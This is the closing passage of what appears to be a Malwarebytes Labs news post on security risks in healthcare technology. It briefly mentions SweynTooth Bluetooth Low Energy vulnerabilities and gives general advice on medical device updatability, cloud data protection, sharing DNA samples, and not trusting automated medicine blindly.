But depending on the nature and particularly the sensitivity of the transmitted data, other considerations might come into play. Unfortunately BLE devices have also been found to be impacted by SweynTooth vulnerabilities.


Developers of medical devices who intend to use Bluetooth as the technology to connect devices with each other and with Wi-Fi should consider carefully which Bluetooth protocol is right for their system. To do this, it is important to have a clear understanding of the needs for the system and the available options.

Medical devices should be easily updatable for those circumstances where new vulnerabilities are found and patches or other important updates need to be applied.

Maybe the healthcare industry should even consider designing a new protocol similar to Bluetooth. Combining the Low Energy properties with some extra security measures might pay off in the long run.

Cloud solutions that are used to store
sensitive personal and medical data deserve to be held against a high security

We recommend only giving up your DNA
samples to trusted organizations and only for reasons of utmost importance like
your health.

Machines are not without fault or as smart as we might think. Blind trust in machines when it comes to healthcare can end in a catastrophy. There is an area where personal attention does a lot more good than the fully automated application of medicine can ever do.

Stay safe, and stay healthy!

The post Biotech health care innovations meet security challenges appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →
Page 1 of 5 12345